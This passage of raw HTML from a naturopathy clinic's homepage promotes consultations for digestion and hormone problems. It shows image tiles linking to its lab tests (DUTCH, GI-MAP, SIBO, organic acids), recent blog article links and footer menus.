https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-510x24.png 510w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-750x35.png 750w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-975x46.png 975w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-1190x56.png 1190w" sizes="(max-width: 1600px) 100vw, 1600px" /></noscript></noscript> </span> </div></div> </div><div class="thrv_wrapper thrv-page-section tcb-window-width" style="width: 1603px; left: -206.514px;" data-css="tve-u-166c403515e"> <div class="tve-page-section-out" data-css="tve-u-166c403515f"></div> <div class="tve-page-section-in tve_empty_dropzone" data-css="tve-u-166c403515c"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166c4077e20"><span class="tve_image_frame" style="width: 100%;"><img class="lazy lazy-hidden tve_image wp-image-4488" alt="" width="86" height="86" title="consultation" data-id="4488" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/10/consultation.png" style="width: 100%;"><noscript><img class="lazy lazy-hidden tve_image wp-image-4488" alt="" width="86" height="86" title="consultation" data-id="4488" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/10/consultation.png" style="width: 100%;" srcset="" data-srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/10/consultation.png 86w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/consultation-80x80.png 80w" sizes="(max-width: 86px) 100vw, 86px" /><noscript><img class="tve_image wp-image-4488" alt="" width="86" height="86" title="consultation" data-id="4488" src="//www.planetnaturopath.com/wp-content/uploads/2018/10/consultation.png" style="width: 100%;" srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/10/consultation.png 86w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/consultation-80x80.png 80w" sizes="(max-width: 86px) 100vw, 86px" /></noscript></noscript></span></div><div class="thrv_wrapper thrv_heading" style="" data-css="tve-u-166c4161301" data-tag="h2"><h2 data-css="tve-u-166c403515b" style="text-align: center;">Schedule a Consultation With Planet Naturopath</h2></div><div class="thrv_wrapper thrv_text_element tve_empty_dropzone" style="" data-css="tve-u-166c4229a64"><h4 class="" data-css="tve-u-166c4035159" style="text-align: center;">Here at Planet Naturopath, we specialize in consulting with people who have digestion and hormone imbalances, and the many conditions that are associated with with this. If you are wanting to optimize your health and performance our detailed testing will help you to address the underlying cause and take out the “guess work”</h4></div><div class="thrv_wrapper thrv-button" data-css="tve-u-166c4201935" data-tcb_hover_state_parent="false" data-button-style="full_rounded"> <a href="https://www.planetnaturopath.com/consulting-us/" class="tcb-button-link"> <span class="tcb-button-texts"><span class="tcb-button-text thrv-inline-text" data-css="tve-u-166c8625e0e"><span data-css="tve-u-166ff14239f"><strong>Schedule Your Appointment</strong></span></span></span> </a> </div></div> </div><div class="thrv_wrapper thrv-page-section tve_empty_dropzone tcb-window-width" data-tve-style="1" data-css="tve-u-166c408ba91" style="width: 1603px; left: -206.5px;"><div class="tve-page-section-out" data-css="tve-u-166c408ba8f"></div><div class="tve-page-section-in" data-css="tve-u-166c408bac9"> <div class="thrv_wrapper thrv_heading" style="" data-css="tve-u-166c403515d" data-tag="h2"><h2 data-css="tve-u-166c403515b" style="text-align: center;">Our most popular tests</h2></div><div class="thrv_wrapper thrv-columns" data-css="tve-u-166ff15256d"><div class="tcb-flex-row tcb--cols--4" data-css="tve-u-166ff151d5a"> <div class="tcb-flex-col tve_empty_dropzone"><div class="tcb-col tve_empty_dropzone"><div style="width: 258px" class="thrv_wrapper tve_image_caption img_style_rounded_corners" data-css="tve-u-166c4100417"> <span class="tve_image_frame" style="width: 100%;"> <a href="https://www.planetnaturopath.com/dutch-test/" class="" target="" rel="" data-tcb-events=""><img class="lazy lazy-hidden tve_image wp-image-4767" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2.png" width="636" height="700" title="Dutch Test 2" data-id="4767"><noscript><img class="lazy lazy-hidden tve_image wp-image-4767" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2.png" width="636" height="700" title="Dutch Test 2" data-id="4767" srcset="" data-srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /><noscript><img class="tve_image wp-image-4767" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2.png" width="636" height="700" title="Dutch Test 2" data-id="4767" srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Dutch-Test-2-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /></noscript></noscript></a> </span> </div></div></div> <div class="tcb-flex-col tve_empty_dropzone"><div class="tcb-col tve_empty_dropzone"><div style="width: 258px" class="thrv_wrapper tve_image_caption img_style_rounded_corners" data-css="tve-u-1655d2d2ff1"> <span class="tve_image_frame" style="width: 100%;"> <a href="https://www.planetnaturopath.com/g-map-test/" target="_blank"><img class="lazy lazy-hidden tve_image wp-image-4769" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test.png" width="636" height="700" title="GI map test" data-id="4769"><noscript><img class="lazy lazy-hidden tve_image wp-image-4769" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test.png" width="636" height="700" title="GI map test" data-id="4769" srcset="" data-srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /><noscript><img class="tve_image wp-image-4769" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test.png" width="636" height="700" title="GI map test" data-id="4769" srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/GI-map-test-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /></noscript></noscript></a> </span> </div></div></div> <div class="tcb-flex-col tve_empty_dropzone"><div class="tcb-col tve_empty_dropzone"><div style="width: 258px" class="thrv_wrapper tve_image_caption" data-css="tve-u-166c417485e"> <span class="tve_image_frame" style="width: 100%;"> <a href="https://www.planetnaturopath.com/sibo-test/" class="" target="" rel="" data-tcb-events=""><img class="lazy lazy-hidden tve_image wp-image-4771" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2.png" width="636" height="700" title="Sibo Test 2" data-id="4771"><noscript><img class="lazy lazy-hidden tve_image wp-image-4771" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2.png" width="636" height="700" title="Sibo Test 2" data-id="4771" srcset="" data-srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /><noscript><img class="tve_image wp-image-4771" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2.png" width="636" height="700" title="Sibo Test 2" data-id="4771" srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Sibo-Test-2-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /></noscript></noscript></a> </span> </div></div></div> <div class="tcb-flex-col tve_empty_dropzone"><div class="tcb-col tve_empty_dropzone"><div style="width: 258px" class="thrv_wrapper tve_image_caption img_style_rounded_corners" data-css="tve-u-166c414447c"> <span class="tve_image_frame" style="width: 100%;"> <a href="https://www.planetnaturopath.com/organic-acids/" class="" target="" rel="" data-tcb-events=""><img class="lazy lazy-hidden tve_image wp-image-4770" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids.png" width="636" height="700" title="Organic Acids" data-id="4770"><noscript><img class="lazy lazy-hidden tve_image wp-image-4770" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids.png" width="636" height="700" title="Organic Acids" data-id="4770" srcset="" data-srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /><noscript><img class="tve_image wp-image-4770" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids.png" width="636" height="700" title="Organic Acids" data-id="4770" srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Organic-Acids-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /></noscript></noscript></a> </span> </div></div></div> </div></div><div class="thrv_wrapper thrv_heading" style="" data-css="tve-u-166c41ea0b9" data-tag="h2"><h2 data-css="tve-u-166c403515b" style="text-align: center;">We also offer</h2></div><div class="thrv_wrapper thrv-columns" data-css="tve-u-166c41b4daf"><div class="tcb-flex-row tcb--cols--2"> <div class="tcb-flex-col tve_empty_dropzone"><div class="tcb-col tve_empty_dropzone" data-css="tve-u-166c41a77cf"><div style="width: 258px" class="thrv_wrapper tve_image_caption img_style_rounded_corners" data-css="tve-u-166c411ae0b"> <span class="tve_image_frame" style="width: 100%;"> <a href="https://www.planetnaturopath.com/thyroid-testing/"><img class="lazy lazy-hidden tve_image wp-image-4768" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing.png" width="636" height="700" title="Extensive Thyroid Testing" data-id="4768"><noscript><img class="lazy lazy-hidden tve_image wp-image-4768" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing.png" width="636" height="700" title="Extensive Thyroid Testing" data-id="4768" srcset="" data-srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /><noscript><img class="tve_image wp-image-4768" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing.png" width="636" height="700" title="Extensive Thyroid Testing" data-id="4768" srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Extensive-Thyroid-Testing-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /></noscript></noscript></a> </span> </div></div></div> <div class="tcb-flex-col tve_empty_dropzone"><div class="tcb-col tve_empty_dropzone" data-css="tve-u-166c41abf68"><div style="width: 258px" class="thrv_wrapper tve_image_caption img_style_rounded_corners" data-css="tve-u-166c3ff0d56"> <span class="tve_image_frame" style="width: 100%;"> <a href="https://www.planetnaturopath.com/cardiovascular-tests/"><img class="lazy lazy-hidden tve_image wp-image-4766" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test.png" width="636" height="700" title="Cardiovascular Test" data-id="4766"><noscript><img class="lazy lazy-hidden tve_image wp-image-4766" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test.png" width="636" height="700" title="Cardiovascular Test" data-id="4766" srcset="" data-srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /><noscript><img class="tve_image wp-image-4766" alt="" style="width: 100%;" src="//www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test.png" width="636" height="700" title="Cardiovascular Test" data-id="4766" srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test.png 636w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-136x150.png 136w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-273x300.png 273w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-73x80.png 73w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-200x220.png 200w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-91x100.png 91w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-216x238.png 216w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-377x415.png 377w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-442x487.png 442w, https://www.planetnaturopath.com/wp-content/uploads/2018/11/Cardiovascular-Test-541x595.png 541w" sizes="(max-width: 636px) 100vw, 636px" /></noscript></noscript></a> </span> </div></div></div> </div></div> </div> </div><div class="thrv_wrapper thrv_heading" style="" data-css="tve-u-166c4168b81" data-tag="h2"><h2 data-css="tve-u-166c403515b" style="text-align: center;">Latest Articles</h2></div><div class="thrv_wrapper thrv_post_grid" data-unit="px" data-css="tve-u-166c41f326e"> <div class="thrive-shortcode-config" style="display: none !important"></div><div class="tve_post_grid_wrapper tve_clearfix thrive-shortcode-html tve_post_grid_grid"><div class="tve_pg_row tve_clearfix"> <div class="tve_post tve_post_width_3"> <div class="tve_pg_container"> <a href="https://www.planetnaturopath.com/hormones/how-do-you-know-if-you-have-low-testosterone/"><div class="tve_post_grid_image_wrapper" style="background-image: url(https://www.planetnaturopath.com/wp-content/uploads/2019/05/How-Do-You-Know-If-You-Have-Low-Testosterone_.png ); height: 200px"><div class="tve_pg_img_overlay"><span class="thrv-icon thrv-icon-forward"></span></div></div></a><span class="tve-post-grid-title" style="font-size: 25px;line-height: 25px;"><a href="https://www.planetnaturopath.com/hormones/how-do-you-know-if-you-have-low-testosterone/">How Do You Know If You Have Low Testosterone?</a></span><div class="tve-post-grid-text">Low testosterone - a problem that each and every man would like to prevent at any cost. But the truth&#91;...&#93;</div><div class="tve_pg_more"><a href="https://www.planetnaturopath.com/hormones/how-do-you-know-if-you-have-low-testosterone/">Read More</a>&nbsp;<span class="thrv-icon thrv-icon-uniE602"></span></div> </div> </div> <div class="tve_post tve_post_width_3"> <div class="tve_pg_container"> <a href="https://www.planetnaturopath.com/healthy-foods/benefits-of-fiber/"><div class="tve_post_grid_image_wrapper" style="background-image: url(https://www.planetnaturopath.com/wp-content/uploads/2019/05/featured-image-1.png ); height: 200px"><div class="tve_pg_img_overlay"><span class="thrv-icon thrv-icon-forward"></span></div></div></a><span class="tve-post-grid-title" style="font-size: 25px;line-height: 25px;"><a href="https://www.planetnaturopath.com/healthy-foods/benefits-of-fiber/">Benefits of Fiber (who should eat fiber and who should avoid fiber)</a></span><div class="tve-post-grid-text">When you read the standard dietary advice, it says to eat 25 to 40 grams of fiber a day for&#91;...&#93;</div><div class="tve_pg_more"><a href="https://www.planetnaturopath.com/healthy-foods/benefits-of-fiber/">Read More</a>&nbsp;<span class="thrv-icon thrv-icon-uniE602"></span></div> </div> </div> <div class="tve_post tve_post_width_3"> <div class="tve_pg_container"> <a href="https://www.planetnaturopath.com/healthy-foods/keto-diet-your-digestive-health/"><div class="tve_post_grid_image_wrapper" style="background-image: url(https://www.planetnaturopath.com/wp-content/uploads/2019/03/Keto-Diet-Your-Digestive-Health.jpg ); height: 200px"><div class="tve_pg_img_overlay"><span class="thrv-icon thrv-icon-forward"></span></div></div></a><span class="tve-post-grid-title" style="font-size: 25px;line-height: 25px;"><a href="https://www.planetnaturopath.com/healthy-foods/keto-diet-your-digestive-health/">Keto Diet &#038; Your Digestive Health (optimize your gut bacteria)</a></span><div class="tve-post-grid-text">Finding Answers in A Maze of MisconceptionsWhenever you read about diets and exercise routines that break with the norm, you’re&#91;...&#93;</div><div class="tve_pg_more"><a href="https://www.planetnaturopath.com/healthy-foods/keto-diet-your-digestive-health/">Read More</a>&nbsp;<span class="thrv-icon thrv-icon-uniE602"></span></div> </div> </div> </div> </div> </div><div class="thrv_wrapper thrv-button" data-css="tve-u-166c4035160" data-tcb_hover_state_parent="false" data-button-style="full_rounded"> <a href="https://www.planetnaturopath.com/blog" class="tcb-button-link"> <span class="tcb-button-texts"><span class="tcb-button-text thrv-inline-text" data-css="tve-u-166c4035161"><span data-css="tve-u-166c862b9bc"><strong>View more blog posts</strong></span></span></span> </a> </div></div></div><div class="tcb_flag" style="display: none"></div> </div> <div class="clear"></div> </div> </section> </div> <div class="clear"></div> <footer> <div class="fmw"> <div class="wrp"> <div class="colm twc "> <section id="recent-posts-4" class="col"><div class="scn"> <p class="ttl">Recent Posts</p> <ul> <li> <a href="https://www.planetnaturopath.com/hormones/how-do-you-know-if-you-have-low-testosterone/">How Do You Know If You Have Low Testosterone?</a> </li> <li> <a href="https://www.planetnaturopath.com/healthy-foods/benefits-of-fiber/">Benefits of Fiber (who should eat fiber and who should avoid fiber)</a> </li> <li> <a href="https://www.planetnaturopath.com/healthy-foods/keto-diet-your-digestive-health/">Keto Diet &#038; Your Digestive Health (optimize your gut bacteria)</a> </li> <li> <a href="https://www.planetnaturopath.com/digestion/viome-review-pros-and-cons/">Viome Review (Pros and Cons)</a> </li> <li> <a href="https://www.planetnaturopath.com/digestion/gut-bacteria-hormones-2/">Improve Your Gut Bacteria to Improve Your Hormones</a> </li> <li> <a href="https://www.planetnaturopath.com/hormones/best-way-test-hormones/">The Best Way To Test Your Hormones (hint-it depends on which hormones you are testing)</a> </li> <li> <a href="https://www.planetnaturopath.com/functional-medicine/causes-of-fatigue/">21 Causes of Fatigue &#038; What To Do About Them</a> </li> <li> <a href="https://www.planetnaturopath.com/digestion/parasites-and-natural-treatments-plus-how-to-test/">Parasites and Natural Treatments (plus how to test)</a> </li> <li> <a href="https://www.planetnaturopath.com/planet-naturopath/tiny-changes-that-can-help-you-make-big-changes-to-your-health/">Tiny Changes That Can Help You Make Big Changes to Your Health</a> </li> <li> <a href="https://www.planetnaturopath.com/nutrition/keto-supplements/">Do Keto Supplements Work?</a> </li> <li> <a href="https://www.planetnaturopath.com/hormones/pregnancy-and-motherhood-summit/">Pregnancy and Motherhood Summit (optimal health for mother and baby)</a> </li> </ul> </div></section> </div> <div class="colm twc lst"> <section id="nav_menu-5" class="col"><div class="scn"><p class="ttl">Problem&#8217;s We Solve</p><div class="menu-problems-we-solve-3-container"><ul id="menu-problems-we-solve-3" class="menu"><li id="menu-item-2252" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2252"><a href="https://www.planetnaturopath.com/adrenal-fatigue-2/">Adrenal Fatigue old</a></li> <li id="menu-item-2253" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2253"><a href="https://www.planetnaturopath.com/cardiovascular-disease/">Cardiovascular Disease &#038; Health</a></li> <li id="menu-item-2254" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2254"><a href="https://www.planetnaturopath.com/depression-and-anxiety/">Depression and Anxiety</a></li> <li id="menu-item-2255" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2255"><a href="https://www.planetnaturopath.com/fatigue/">Fatigue</a></li> <li id="menu-item-2256" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2256"><a href="https://www.planetnaturopath.com/irritable-bowel-syndrome-testing/">Irritable Bowel Syndrome Testing</a></li> 